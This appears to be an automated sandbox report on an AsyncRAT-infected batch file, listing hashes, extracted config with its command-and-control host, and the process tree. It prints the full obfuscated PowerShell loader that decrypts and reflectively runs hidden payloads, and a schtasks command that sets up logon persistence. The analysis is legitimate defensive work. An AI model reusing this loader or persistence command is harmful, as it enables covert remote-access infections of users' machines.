Analysis
-
max time kernel
15s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
19-10-2024 23:02
Static task
static1
General
-
Target
Infected.bat
-
Size
74KB
-
MD5
25d86af45fcc93078ac8ff2dd1e83314
-
SHA1
fd00fd08a9e264bf2470ca17d4b118522fae48fa
-
SHA256
40268fb4a5e084301d9b6ab32e204b19ca690bea4dbff104881f794f036c4c56
-
SHA512
518ccc58c6c4eb3c744f4f417892d802dfa13cdb0fbc98020787b5534d12d602e8087741189dfa9ea7eeff9ce09714638b144771692e375fa93d249609debe24
-
SSDEEP
768:s1yoKUYWJ5jQm6+iPOf9EwY+yIkwJJke7RA65LyTUtwfMMT4bKfdYeXAG6qUo+Rd:Boqa5jHdlFMIkylRB5Gjeep6q6vSp2SY
Malware Config
Extracted
asyncrat
Default
policy-sas.gl.at.ply.gg:43122
-
delay
1
-
install
true
-
install_file
Photos.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2388-15-0x000002B16AA90000-0x000002B16AAA6000-memory.dmp family_asyncrat -
Executes dropped EXE 1 IoCs
Processes:
Photos.exepid process 2196 Photos.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4092 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
powershell.exePhotos.exepid process 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2196 Photos.exe 2196 Photos.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exePhotos.exedescription pid process Token: SeDebugPrivilege 2388 powershell.exe Token: SeDebugPrivilege 2388 powershell.exe Token: SeDebugPrivilege 2196 Photos.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exepowershell.execmd.execmd.exedescription pid process target process PID 1064 wrote to memory of 2388 1064 cmd.exe powershell.exe PID 1064 wrote to memory of 2388 1064 cmd.exe powershell.exe PID 2388 wrote to memory of 3380 2388 powershell.exe cmd.exe PID 2388 wrote to memory of 3380 2388 powershell.exe cmd.exe PID 2388 wrote to memory of 3632 2388 powershell.exe cmd.exe PID 2388 wrote to memory of 3632 2388 powershell.exe cmd.exe PID 3632 wrote to memory of 4092 3632 cmd.exe timeout.exe PID 3632 wrote to memory of 4092 3632 cmd.exe timeout.exe PID 3380 wrote to memory of 2936 3380 cmd.exe schtasks.exe PID 3380 wrote to memory of 2936 3380 cmd.exe schtasks.exe PID 3632 wrote to memory of 2196 3632 cmd.exe Photos.exe PID 3632 wrote to memory of 2196 3632 cmd.exe Photos.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Infected.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rfPx2/qjPEULy3w9Vw91tAJgXSLsh+wieWCmL2bqeJE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uoQNNJFNYFBjzV7jmi3PfQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $huwyq=New-Object System.IO.MemoryStream(,$param_var); $asgET=New-Object System.IO.MemoryStream; $pgUdN=New-Object System.IO.Compression.GZipStream($huwyq, [IO.Compression.CompressionMode]::Decompress); $pgUdN.CopyTo($asgET); $pgUdN.Dispose(); $huwyq.Dispose(); $asgET.Dispose(); $asgET.ToArray();}function execute_function($param_var,$param2_var){ $MXcqt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wghyx=$MXcqt.EntryPoint; $wghyx.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Infected.bat';$dNySU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Infected.bat').Split([Environment]::NewLine);foreach ($NKwGP in $dNySU) { if ($NKwGP.StartsWith(':: ')) { $rNMtY=$NKwGP.Substring(3); break; }}$payloads_var=[string[]]$rNMtY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Photos" /tr '"C:\Users\Admin\AppData\Roaming\Photos.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Photos" /tr '"C:\Users\Admin\AppData\Roaming\Photos.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:2936 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8F4F.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:4092 -
C:\Users\Admin\AppData\Roaming\Photos.exe"C:\Users\Admin\AppData\Roaming\Photos.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
150B
MD5641de6cf81753c1b4f6c5b5426b92524
SHA104b4d8f00047d9cdcfb23271e5a4212caf4f3771
SHA2566ff91b25ebb9b9417b3c1d75ccc8ae7303b6015d837d373198ec195ccdf41003
SHA512365a0920a92dca07d4ee59c738a954a751efdb153ec3265fe9c8715455228acdfff3adbe322271db15f6066b72eb4fb9296a6544aa4cf1e38eed417a5d30678d
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d